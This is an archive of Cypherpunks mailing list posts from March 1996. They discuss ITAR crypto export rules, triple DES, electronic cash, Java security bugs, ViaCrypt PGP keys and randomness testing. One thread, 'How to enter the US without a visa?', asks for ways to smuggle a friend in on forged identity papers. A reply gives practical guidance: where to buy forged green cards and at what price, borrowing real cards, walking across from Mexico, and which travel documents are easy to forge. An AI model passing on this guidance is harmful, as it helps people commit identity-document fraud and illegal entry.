Date: Thu, 28 Mar 1996 11:47:19 +0800
To: cypherpunks@toad.com
Subject: Re: About Triple DES ......
In-Reply-To: <19960327040302.536.qmail@ns.crynwr.com>
Message-ID: <Pine.SUN.3.92.960326221907.4439A-100000@elaine41.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On 27 Mar 1996 nelson@crynwr.com wrote:

> Um, what if Victor and www.cs.hut.fi are only connected on a path that
> traverses the United States?  Can a person be convicted of ITAR
> violations when they've never been in the U.S.?  :)

If neither endpoint includes US citizens or residents, or people working
on the behalf of US citizens or residents, no.

Very interesting hypothetical, though. I'm pretty sure that in this case,
it's a fact, not a hypothetical.

A more complicated hypothetical: if Victor told MCI/Sprint/whatever, the
news media, and the US authorities of his intent to download triple-DES in
this way, would MCI/Sprint/whatever be liable? Any cypherpunks in Latin
America? How about from Asia to Finland -- what does that route look like?
Something along the lines of that "Pastors for Peace" media hoax, which
is a perennial show of an attempt to deliver US goods to embargoed Cuba,
might be worth engineering.

At some point in this exercise, though, we might be "raising awareness"
among the wrong people, to cite Tim May. I wouldn't want NAFTA, the WTO,
and so on enforcing ITAR.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Thu, 28 Mar 1996 09:35:46 +0800
To: cypherpunks@toad.com
Subject: Re: (X:x)e$ 's other use
Message-ID: <199603270702.XAA03398@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 04:05 PM 3/26/96 EDT, E. ALLEN SMITH wrote:
> The
> Fed has done an actually rather admirable job of standing up to the pressure

Every couple of years the politicians start leaning on Greenspan.  Greenspan
lets it be known they are leaning on him, the money markets mark the 
dollar down and the politicians stop leaning on him.

The Greenspan standard is not a good as a gold standard, but its not bad.  Only
trouble is he is mortal, unlike gold.

Come to think of it, there is actually some crypto relevance here:  Internet 
currencies will be necessarily non physical and it will be difficult to go
after the issuer in the event of default, so the best currency will have a
value that depends on peoples belief that the issuer will defend the value
of the currency.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Thu, 28 Mar 1996 09:36:19 +0800
To: cypherpunks@toad.com
Subject: How to enter the US without a visa?
Message-ID: <199603270702.XAA03414@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


This is somewhat off topic for cypherpunks, but alt.forgery is dead, so
cypherpunks is probably the nearest group.

Suppose (hypothetically) an American resident cypherpunk had a 
hypothetical friend who is most unlikely to obtain an American visa.

Now the standard way of dealing with situation is for an American
friend to get a certified birth certificate of someone born in 
America, concoct some photo ID, send it to the out-of-America friend,
and then the out-of-America friend comes in through Montego Bay or
some similar point where there is lots of tourist traffic.

But the thought struck me that this might not work for some one
who hypothetically has a foreign appearance and a truly terrible 
accent.

Now a fake greencard would probably work, but greencards have
age and sex etc encoded on them, and conceivably they check them
against a database, in which case it would be necessary to obtain
the greencard number of a real person of the right age and sex,
which is not easy.

Any suggestions?  Surely lots of people have dealt with this 
problem already.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Thu, 28 Mar 1996 09:34:56 +0800
To: cypherpunks@toad.com
Subject: Re: Let's *NOT* "Raise their Awareness"
Message-ID: <199603270703.XAA03440@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 06:07 PM 3/26/96 -5:00, Michael C. Peponis wrote:
>On  Tue, 26 Mar 1996 , David K. Merriman wrote:

> The judge is correct in this matter, most people view it from the 
> rights of the parents, but what about the child who, because of 
> his/her parents egotism and ignorance, grows up not being able to 
> compete effectivly?

I am sure the judge is right in this matter, but is in any of his 
damned business.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 28 Mar 1996 09:37:57 +0800
To: shabbir@vtw.org (Shabbir J. Safdar)
Subject: Re: So, what crypto legislation (if any) is necessary?
Message-ID: <m0u1oq0-00093VC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:59 AM 3/26/96 -0800, Timothy C. May wrote:
>At 7:08 AM 3/26/96, Shabbir J. Safdar wrote:

>My point is that I see no compelling legislation that is needed. If enough
>people in Washington really want increased length in _exported products_
>(remember the "exported" part), the Congress and the President should find
>it easy enough to get said products on to the Approved List. (I note that
>the Leahy Bill really doesn't change this system anyway...some products go
>on the list, some don't...the law only seems to say that when the horse has
>already left the barn, i.e., when "comparable" products are already in
>fairly wide use outside the U.S., then the products should be put on the
>approved list. Big deal.

There is, however, a slightly different way of looking at this.  For 
centuries, there was a saying "Nature abhors a vacuum."  While not 
scientifically correct, from the standpoint of people living below an ocean 
of atmosphere it seemed to be true.  Likewise, the political system seems to 
abhor a situation where there is neither law, nor a proposed law.  The best 
tactic might be to insist on modifications to the Leahy bill, most of which 
are quite justified, but cumulatively will be seen by "the enemy" as being 
so extreme as to be unacceptable.  At that point, the enemy may actually 
agree with our assessment that no law is better than the corrected Leahy 
bill, and we'll both walk away satisified with the "no law" option.

Think of it like pouring sugar into a gas tank.

[stuff deleted]

>
>And, frankly and bluntly, while I am not as extreme (in some ways) as, say,
>Jim Bell, in other ways I and many others of us are quite extreme.

Hey, see, I'm useful!  I make you look more, uh, "reasonable", right?

Jim Bell
jimbell@pacifier.com

 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@atlas.ex.ac.uk
Date: Thu, 28 Mar 1996 07:12:17 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: So, what crypto legislation (if any) is necessary?
Message-ID: <21485.9603262306@sirius.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



At 4:11 PM 3/26/96, Adam Shostack wrote:
>Timothy C. May wrote:
> >        I'm forced to disagree on this point.  I think that the
> >comparable product has the potential to be a very big deal; it means
> >that any product using IDEA or 3DES may become exportable, because
> >such products are available outside the US.
> 
> I certainly don't disagree that if Leahy is passed, which is unlikely, then
> conventional ciphers like 3DES will become exportable. (And I am forced to
> add, "Big deal.")
>
> What I'm more interested in are not the ciphers which had their genesis in
> the crypto work of the 70s, but in the new and exciting applications to
> come. Things such as this list often discusses. I believe Leahy could stall
> export of these new items until eventually there are offshore equivalents
> of sufficiently wide deployment that the Leahy clause would get invoked.

On the ITAR issue, and whether this is a big deal for someone living
in the US, it seems to me that the major annoyance of ITAR is that it
slows down development, and commercial uptake of crypto because the
internet is a worldwide market place.

ie I would have thought that getting rid of ITAR would be beneficial
to internet commerce in general, and likely advance uptake of
electronic cash (by several years?)  For whatever reasons (best known
to themselves) even big fish like netscape, and microsoft don't seem
to have any stomach for taking on the USG in any meaningful way over
the issue.

I'd view widely deployed electronic cash to be a step in the right
direction opening the way for more interesting crypto applications.

What's your analysis on this?  Do you think I am over-rating the
negative effects of ITAR on furtherment of electronic cash?  What say
about electronic cash as a catalyst for uptake of other crypto
applications?

(my use of "electronic cash" above refers to payee and payer
anonymous, not electronic cheques or credit card transactions over the
internet)

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Herb Sutter <herbs@connobj.com>
Date: Fri, 29 Mar 1996 22:55:34 +0800
To: kermie@paonline.com (Dan Ringley)
Subject: Re: DESCRIBE
Message-ID: <2.2.32.19960327042728.0072a724@mail.interlog.com>
MIME-Version: 1.0
Content-Type: text/plain


At 14:27 03.26.1996 -0500, Perry E. Metzger wrote:
>If you had an ounce of intelligence, of course, you would simply use
>the automated unsubscription instructions you got when you
>subscribed. Sadly for the rest of us, who will now have to deal with
>your whining indefinately, intelligence is a commodity in precious
>supply around this planet.

The total intelligence on the planet is constant.  The population is growing.

---
Herb P. Sutter                            Current Network Technologies Corp.
Senior Architect, Distributed Computing   2655 Benedet, Mississauga ON Canada
Cell 416-618-0184                         Tel 416-805-9088   Fax 905-855-7194





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Thu, 28 Mar 1996 09:39:43 +0800
To: cypherpunks@toad.com
Subject: Re: Crypto CD UpDate (fwd)
Message-ID: <199603270547.XAA10979@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> It pains me to often be the one who throws cold water on what seems to be a
> good idea, and what comes from a well-intentioned person. But I have to
> call 'em as I see 'em. And maybe I'm wrong. But here are my thoughts.

You know you love it...;)

> 1. The CD-ROM "freezes" the various programs, archives, etc. at the moment
> the files are finalized and the CD-ROMs are pressed (or burned individually
> on a CD-R, at somewhat higher per-copy price). If the author of the CD-ROM
> is not committed to updating the CD-ROM at frequent intervals--say, every
> few months--then the programs will exhibit "version decay" and be nearly
> useless.
> The next point is the reason.

I do soho consulting and I help provide several of my customers with
software of various nature. One thing I have come to realize is that they
are not interested in being in the fast lane. They are secure in knowing
that the software behaves in a predicible way (not necessarily designed that
way either). A large part of this attitude is based in their not being
computer anything sorts. I find CD's a great way to keep libraries of old
software that sometimes comes in handy.

> 2. The Web does a better job at making the latest versions instantly
> accessible. True, a CD-ROM will generally have faster access, but I care
> more about getting the _latest_ version of PGP, even if takes a minute or
> two to snarf off the Web. That I could get an _older_ version of PGP in
> fractions of a second off this CD-ROM is not compelling to me. (And
> fractions of a second is too charitable: in actuality, I'd have to locate
> the CD-ROM, dismount anything already mounted, mount the CD-ROM, search it
> for "PGP," etc. Probably not even faster than using Alta Vista and
> downloading.)

Yes, except it is much easier to track my access to the web than my CD-Rom.

> 4. The Web approach allows powerful search engines, links from other pages,
> and--importantly--multiple jurisdictions. The PGP could come from the U.S.,
> the Digital Postage code from Sweden, and so on. And, again as noted in #
> 1, the developers could keep improving and iterating the code.

CD's are great advertising.

 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Gibbons <steve@aztech.net>
Date: Thu, 28 Mar 1996 09:39:26 +0800
To: frantz@netcom.com
Subject: Re: WSJ on Big Java Flaw
Message-ID: <0099FEF9.CAF81C60.361@aztech.net>
MIME-Version: 1.0
Content-Type: text/plain


In Article: <199603261814.KAA23974@netcom5.netcom.com>, frantz@netcom.com (Bill Frantz) wrote:
# At 10:58 AM 3/26/96 -0500, John Young wrote:

# >   Java was originally touted by Sun as a secure language. But
# >   at least two other flaws have already been discovered in
# >   the technology, including a less-serious problem uncovered
# >   by the Princeton team last month. Sun's Ms. Mueller said
# >   the problems have been correctable details in the way the
# >   Java code is written, not problems with its basic design.

Actually, I suspected and reported the same bug some weeks before the group at
Princeton.  <URL: http://www.aztech.net/~steve/java/~>.  That said...

# Having worked on a secure OS, with a small security kernel etc. etc. etc. I
# realize that even those systems have bugs.  The Java people will work out
# their bugs.  Others will read their code and find more bugs.  (It is to
# Sun's GREAT credit that they are releasing their source under a not very
# restrictive license.)  Eventually, in several years, Java security will be
# ready for prime time.

This is exactly what I would say.  Sun has released source code for what that
they label as "Beta Software."  I agree with their labeling, and don't fault
them for having buglets in beta software.  I commend them for releasing souce
code.  My biggest gripe is with other companies (no names mentioned) who are
shipping Java, integrated and "turned on" by default in their
"production-level" products.

# Of course, for really valuable things, or the really paranoid, you
# shouldn't connect your computer to a network.  The top dog certificate key
# in SET is handled this way.

Generally good advice.  (SET is an "Alpha Specification" and has its own
problems, that I won't go into here, but again, I commend the principals
involved for allowing "outsiders" to view and comment.)

I'd also add that running uncertified (by the local CA) applications is bad 
voodoo, and should be avoided, but that's an issue that most admins don't have 
much real control over in most environments.

--
Steve@AZTech.Net

[ I thought about adding a P.S., but most of you probably don't care what I do
  for a living, who I work for, nor what I work on, and why.  Send email if
  you're curious. ]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Thu, 28 Mar 1996 20:29:48 +0800
To: cypherpunks@toad.com
Subject: Re: How to enter the US without a visa?
In-Reply-To: <199603270702.XAA03414@dns2.noc.best.net>
Message-ID: <Pine.SUN.3.92.960326233221.5113A-100000@elaine41.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 26 Mar 1996 jamesd@echeque.com wrote:

> This is somewhat off topic for cypherpunks, but alt.forgery is dead, so
> cypherpunks is probably the nearest group.

On the contrary, I think (undermining) the idea of state-defined identity
is pretty essential.

> But the thought struck me that this might not work for some one
> who hypothetically has a foreign appearance and a truly terrible
> accent.
>
> Now a fake greencard would probably work, but greencards have
> age and sex etc encoded on them, and conceivably they check them
> against a database, in which case it would be necessary to obtain
> the greencard number of a real person of the right age and sex,
> which is not easy.

Note that the original-style green cards are all going to become invalid
any day now. Don't remember exactly when. Hurry! Still, you can get a very
good forgery of the new style in, say, New York, Los Angeles, or Redwood
City for $100. The problem is, you need to be a part of the community
already to be able to find out, in a reasonable amount of time, where to
get the good forgeries without getting arrested. If you have the right
friends, like if you're a member of certain extended families in Matamoros
or New York's ChinaTown, then you can arrange to *borrow* a *real* green
card with a similar picture.

If this friend could pass for Latin American, you have it easy -- just
have him or her fly into Mexico and walk across the border. Unless
something major has changed in the last six months, there's such high
traffic, and there's so many people with no or *terrible* forgeries, that
people with passable forgeries can walk right through without a
technological verification. Very low risk, but very high potential cost.

Another option, much less commonly forged and somewhat less suspicious
than green cards, is a "stateless person travel document." These were
given mostly to refugees from the Communist Bloc. They look a lot like a
US Passport, are just as easy to forge, do not require a current picture
(in fact, they're probably more credible with a 4-year-old picture), and
in theory are accepted as equivalent to a US passport. An ex-girlfriend
from Czechoslovakia had one. The problem is, most line immigration
officials have never seen one, so you're likely to get bumped to a
supervisor; but if you have an acceptable ethnic background and decent
bullshitting skills in any language, you're in.

My ex never had any trouble getting into or out of Mexico, but she finally
got fed up with the incompetence of the line officers and became a
citizen, which despite her thirteen years in the US, perfect English, a
degree in political science from an Ivy-League school, and an internship
with the foreign service in DC one summer, was a two-year comedy of
incredible errors and incompetence at the INS. Example: once she sent them
some forms filled out in duplicate. The INS sent them back two months
later, requesting that she resubmit just one copy. They were later proven
wrong -- they did need two copies.

Understand that these are the people you're dealing with.

Finally, I assume your friend can swim. I would recommend avoiding Pacific
locales where chumming is commonly practiced.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charles Bell <quester@eskimo.com>
Date: Fri, 29 Mar 1996 15:08:06 +0800
To: "David K. Merriman" <merriman@arn.net>
Subject: Re: Let's *NOT* "Raise their Awareness"
In-Reply-To: <2.2.32.19960325205224.006866dc@arn.net>
Message-ID: <Pine.SUN.3.92.960327001757.5631B-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 26 Mar 1996, David K. Merriman wrote:

> whatever language one chooses. It seems that here in Texas (specifically,
> here in Amarillo), a local judge informed a Hispanic family that they were
> prohibited from speaking _only_ Spanish to their child at home. The
> rationale was that since English is the (ostensibly, in this area) Public
> Language of the school system here, failure to encourage use of English
> would adversely impact the child's education, and was thus a form of child
> abuse. If need be, I can provide excerpts from the local snoozepapers

Yes, and some years ago a State legislature (I forget which) passed a
resolution setting the value of pi at exactly 3.  I'm not sure how they
planned to enforce their will.  Do you know how the Texas judge means to
enforce his?

Charles Bell






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 28 Mar 1996 20:25:56 +0800
To: pgut001@cs.auckland.ac.nz
Subject: Re: Test case for RSA t-shirts
Message-ID: <199603270836.AAA20251@dfw-ix12.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


There was a certain amount of international arms dealing at the
Palo Alto Quaker meeting this week.  Aside from the folks with the
anti-assault-rifle petition, there was one person with an RSA sweatshirt
(the Joel Furr flavor) and a woman from Eastern Europe (Slovenia?)
who was probably not an Official US Person :-)

My general guess about reception you'll get in the airports is that
nobody will notice.  It's worked for me domestically, anyway.
#--
#			Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215 pager 408-787-1281

1995: Chat rooms, espresso, and Linux
1996: Exon, melatonin, and Java.  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Thu, 28 Mar 1996 09:40:16 +0800
To: cypherpunks@toad.com
Subject: Random Number Testing (fwd)
Message-ID: <199603270644.AAA11029@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi Fred,

Forwarded message:

> Subject: Random Number Testing
> Date: Tue, 26 Mar 1996 18:00:26 -0800 (PST)
> From: Fred <admin@dcwill.com>
> 
> The limitation seems to be in the testing process.
> 
> An inviolable rule of test and measurement is that the testing process
> must have a higher degree of accuracy and precision than is expected from
> the item under test. If all you have is a non-graduated stick one meter 
> long, you can't measure increments of less than one meter unless you add 
> some additional resolution to the system (such as a human's judgment
> that the object is four sticks, plus about another third of a stick,
> long).

Not if I am allowed geometry. I believe such situations are a test of
lateral thinking more than any fundamental insite into nature.

> 
> Our ability to synthesize pseudo-random data, and the degree to which
> it approaches true random data, is limited by our ability to discern
> between the two. If the best testing process available yields the
> same results for the output of a true RNG and a particular PRNG, what
> can be done to improve the randomness of the PRNG? How could we tell
> the difference based on the data itself? 

What are you defining as random? The definition I use in practice is basicly
that if I am given 100% intelligence on a stream of numbers the odds of my
succesfully choosing the next number is never higher than chance.

All data is random (by definition) until the pattern(s) can be discerned.
In this context pseudo-random has a definite meaning, namely that it takes a
long time to amass enough information about the data stream to break the
chance boundary. The question quickly becomes, how do you test various
sequences against one another for robustness? It seems to me that it has to
be done statisticaly.

One aspect of this is what I call the 'ghost' pattern. In short, in the
process of analyzing some random data a pattern is found. Is it possible
that there could be more than one pattern (ie interpretation) of the data?
Is it possible for a data stream to contain two (or more) messages
coherently? If a message does contain two or more coherent messages, how
does this affect the size of the data? Can this occur only on messages above
a certain size?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 29 Mar 1996 05:09:53 +0800
To: cypherpunks@toad.com
Subject: Why Americans feel no compulsion to learn foreign languages
Message-ID: <ad7e4b691902100484d7@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:27 AM 3/27/96, Herb Sutter wrote:

>If you'll excuse a European joke: "Q: What does a European call someone who
>speaks four languages?  A: Gifted.  Q: Three languages?  A: Bright.  Q: Two
>languages?  A: Normal.  Q: One language?  A: American." :-)  (No, this isn't
>a snub, it's just meant in good humour; it applies to a lot of us Canucks
>too even though we do have two official languages.  Heck, I apply it to
>myself; my French is rusty, I haven't used it in over 12 years.)

A girlfriend of mine was born in Denmark and spoke four languages (Danish,
English, German, and French) before immigrating here at the age of 19.
Danish was of course her native language, English is taught in all
countries of Europe as a _lingua franca_ (ironically), German because the
Danes have the Germans as neighbors, and French as her "elective."

For Europeans, knowing the language of one's immediate neighbors (probably
only a hundred kilometers away), and knowing English, accounts for much of
their language facility.

Americans are typically thousands of miles away from those speaking
Japanese, Mandarin, Tagalog, Polish, Italian, Dutch, Spanish, Hindi,
Talegu, and the hundreds of other languages. It is not at all clear what
language Americans should pick as a "second language" to study.

(Myself, I studied some German in high school, largely because in the 60s
this is what science folks were expected to take. Artsy craftsy folks took
French, and the slackers took Spanish. The real wonks took Latin, mainly to
help them on their verbal SATs. Russian was offered as a trendy addition,
later replaced by Mandarin and Japanese, the supposedly "essential business
languages of the future," which have turned out not to be essential at
all.)

Europeans who look down on Americans for not studying the language of their
neigbors simply aren't familiar with a map. The one language that a
neighbor of ours differs on is Spanish, and this language is, for various
reasons, useful mainly in infrequent vacations in Mexico, for speaking to
gardeners and maids, and for giving instructions to day laborers and
factory workers. Inasmuch as all Mexican hotels and restaurants understand
English, and inasmuch as not many Americans travel to Mexico for other than
vacations by the sea, etc., things become clearer.

There is not a single foreign language I can think of it that would help me
in my goals or help anyone I know. This is the reality of a world dominated
by English-speaking persons and in which all technical people learn
English.

--Tim May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com
Date: Thu, 28 Mar 1996 16:03:42 +0800
To: cypherpunks@toad.com
Subject: Re: About Triple DES ......
In-Reply-To: <Pine.SV4.3.91.960326141838.9870D-100000@servidor>
Message-ID: <19960327040302.536.qmail@ns.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry E. Metzger writes:
 > 
 > Try the International Cryptography Home page to help you find a copy
 > from outside the U.S.
 > 
 > http://www.cs.hut.fi/crypto/

Um, what if Victor and www.cs.hut.fi are only connected on a path that
traverses the United States?  Can a person be convicted of ITAR
violations when they've never been in the U.S.?  :)

-russ <nelson@crynwr.com>    http://www.crynwr.com/~nelson
Crynwr Software   | Crynwr Software sells packet driver support | PGP ok
11 Grant St.      | +1 315 268 1925 voice | If you would seek peace, 
Potsdam, NY 13676 | +1 315 268 9201 FAX   | first seek freedom




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: moen@cyberspace.com (Bruce Moen)
Date: Thu, 28 Mar 1996 05:32:44 +0800
To: Alan Olsen <alano@teleport.com>
Subject: Re: ViaCrypt PGP 4.0 for Windows shipping
In-Reply-To: <2.2.32.19960327060017.0090a994@mail.teleport.com>
Message-ID: <Pine.SUN.3.91.960327053217.29709C-100000@case.cyberspace.com>
MIME-Version: 1.0
Content-Type: text/plain


And I am new here, so doubly sorry for the same reason.  But I was 
corresponding with Via Crypt on this same point and here is a copy of 
what they sent me.  

>From barnhart@viacrypt.comWed Mar 27 05:22:25 1996
Date: Tue, 26 Mar 1996 12:08:49 -0700
From: "Dave Barnhart, ViaCrypt Product Manager" <barnhart@viacrypt.com>
To: moen@cyberspace.com

-----BEGIN PGP SIGNED MESSAGE-----

Dear Sir:

Eric Nesson here at ViaCrypt has shared your email inquiry with me, and I
thought I should contact you to provide you with some clarification and more
information.

The post you read on alt.security.pgp is in reference to *new types of keys*
that ViaCrypt PGP can create.  This means that, in addition to the PGP keys
that we have all been using for a long time now, ViaCrypt PGP can also create
keys with some special attributes.It is these *new types of keys* that are not
recognized by the existing freeware PGP.

You can continue to use your existing keys with ViaCrypt PGP 4.0.  And you can
create new keys that are fully interoperable with all the older PGP's out
there.  It is only when you generate a new key and turn on one of these special
attributes that it becomes unrecognizable by the existing freeware PGP.

These special attributes I refer to are:

1. "This key can be used for encryption/decryption only.  It cannot be used for
digital signatures."
2. "This key can be used for digital signatures only.  It cannot be used for
encryption/decryption."

We call keys with this special attributes 'single-function keys'.

I hope this answers your questions.  If not please do not hesitate to ask.

Best Regards,
David Barnhart
ViaCrypt Product Manager

-----BEGIN PGP SIGNATURE-----
Version: 4.0 Business Edition

iQEVAwUBMVg4u3hUuWjy7vyrAQEG9ggAnfOGI9tkYa8/W66UvTb+7TBmzHbiPPYw
1J8iBOp+Uj75hxUhr9gY45IUZtcqYHLHCECVpoqcLU2iJsVqMKhv5ohmiTYHEW4Z
xYzbO5lpWqL3rkSMRZK/pXnlumfZTuS94jY9bKyn0dDCqeZ2p7UtAE7/HD7DoAIj
4tMnyNxZxvo0IoxPOCxOTKgdrSB3/KxJWZSAWUPvzNBU+XTpfXu4LvI0sZKOS9Nr
0jEUUwmmrawldei31w916Zc20hmHsP6rOfSaiC5n/03ZXgW976q1sBViDAdwuuPP
ktsCrAB5A2MxuYve1XVVRXwPc7rLN4T4RHqUcKgw4nvnbiKmGYcliA==
=OFTV
-----END PGP SIGNATURE-----

  


On Tue, 26 Mar 1996, Alan Olsen wrote:

> I have not seen this here yet, so sorry if you have seen it...
> 
> ViaCrypt is claiming that they are now shipping the Windows version of their
> PGP 4.0.  (I tend to not believe marketing claims until I hear from people
> who actually have it.)
> 
> Does anyone know if there are plans for this version to be interoperable
> with PGP 3.0?
> 
> Furthermore, has anyone tried the new version?
> ---
> Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
>         `finger -l alano@teleport.com` for PGP 2.6.2 key 
>                 http://www.teleport.com/~alano/ 
>   "We had to destroy the Internet in order to save it." - Sen. Exon
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Thu, 28 Mar 1996 09:37:32 +0800
To: cypherpunks@toad.com
Subject: vogon punk haiku
Message-ID: <199603270455.FAA01748@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


  looking down his nose,
Senator Exon banned it
  Haiku's not a crime

  Rights groups lobbying
politicians waffl"ing
  Cypherpunks write code

  At First Virtual
tense hot alien in barn
  encrypts no message

  Later releases
in some communications
  there are signatures

  digicash tokens
no one knows what you're buying
  follow the money

  Senator Exon!
Imminent Death of the Net!
  GIFs at eleven!

  what they cannot read
they don't want to let you say
  you must encrypt it

  Crypto power tools
cannot be exported yet?
  how can they stop them?

  Freeh is watching you
Big Brother is watching you
  NSA listens

  #ifdef crypto
you cannot export this code
  #endif crypto

  if code is outlawed
bhgynjf jvyy unir cevinpl
  talking to their friends

  Beating a dead horse
idle thoughts typed on a train
  need more ideas

Senator Exon
And the horse he rode in on
******* indecent
#--
#			Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215 pager 408-787-1281
# "At year's end, however, new government limits on Internet access threatened
# to halt the growth of Internet use.  [...] Government control of news media 
# generally continues to depend on self-censorship to regulate political and
# social content, but the authorities also consistently penalize those who
# exceed the permissible."  - US government statement on China...

"SigFiles of Unusual Size?  I don't believe they exist!"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rkmoore@iol.ie (Richard K. Moore)
Date: Thu, 28 Mar 1996 11:50:49 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: ITAR double standards?
Message-ID: <v02110113ad7de267a933@[194.125.43.26]>
MIME-Version: 1.0
Content-Type: text/plain



3/26/96, Timothy C. May wrote:
>So, did Intel have to apply to the State Department's office on munitions
>exports in order to send engineers to Malaysia, Israel, Germany, Ireland,
>etc., to do development work? Not that I ever heard. Engineers simply
>hopped on planes and that was that.

        So true.  When I worked in Silicon Valley firms, I noticed how
International Air Courier services were used entirely like
Interdepartmental Mail, with no concern for export laws or import duties,
etc.  If we travelled overseas, _of course_ we took our laptop with all
it's software (including encryption), and _of course_ we'd leave software
copies on colleagues hard disks, after doing demos and such.  All with a
sense of total righteousness -- we were tax-paying wage-earners just doing
our job.

        There's a real irony here, if you think about the Barlow-expressed
sentiment that cyberspace is a new free domain, having achieved escape
velocity from terrestial anachronisms.  While Barlow's critics, it seems,
demolished _that_ thesis as wishful thinking, there's a parallel thesis
that may actually be true: that _corporate environments_ have achieved
escape velocity from civil jurisdiction, and now live in a world where
rules & ethics are relative only to corporate culture, and "parochial"
national laws are to be quietly ignored, knowing there's a highly-paid
legal staff to deal with occasional embarrasments.

        We dream and they implement.


Cheers,
Richard
rkmoore@iol.ie (not on cypherpunks)


~=-=-=-=-=-=-=-=~=-=-=-=-=-=-=-=-=~--~=-=-=-=-=-=-=-=-=~=-=-=-=-=-=-=-=-=~
    Posted by Richard K. Moore  -  rkmoore@iol.ie  -  Wexford, Ireland
     Cyberlib:  www | ftp --> ftp://ftp.iol.ie/users/rkmoore/cyberlib
 ~=-=-=-=-=-=-=-=~=-=-=-=-=-=-=-=-=~--~=-=-=-=-=-=-=-=-=~=-=-=-=-=-=-=-=-=~
 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 28 Mar 1996 00:36:09 +0800
To: cypherpunks@toad.com
Subject: FRE_mad
Message-ID: <199603271157.GAA23525@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


3-27-96 NYT has two stories on the FBI siege of the Freemen tax 
protestors in Montana. One compares Waco and Ruby Ridge 
slaughter to this Freeh-mad cow prion.


FRE_mad








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Schryvers <schryver@radiks.net>
Date: Sat, 30 Mar 1996 06:34:31 +0800
To: cypherpunks@toad.com
Subject: Re: (X:x)e$ 's other use
Message-ID: <199603271348.HAA05321@sr.radiks.net>
MIME-Version: 1.0
Content-Type: text/plain


At 10:30 PM 3/26/96 -0800, you wrote:
>At 04:05 PM 3/26/96 EDT, E. ALLEN SMITH wrote:
>> The
>> Fed has done an actually rather admirable job of standing up to the pressure
>
>Every couple of years the politicians start leaning on Greenspan.  Greenspan
>lets it be known they are leaning on him, the money markets mark the 
>dollar down and the politicians stop leaning on him.
>
>The Greenspan standard is not a good as a gold standard, but its not bad.  Only
>trouble is he is mortal, unlike gold.
>
>Come to think of it, there is actually some crypto relevance here:  Internet 
>currencies will be necessarily non physical and it will be difficult to go
>after the issuer in the event of default, so the best currency will have a
>value that depends on peoples belief that the issuer will defend the value
